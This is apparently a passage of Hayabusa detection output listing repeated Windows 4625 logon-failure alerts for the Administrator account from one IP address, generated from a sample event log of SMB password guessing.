NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: 
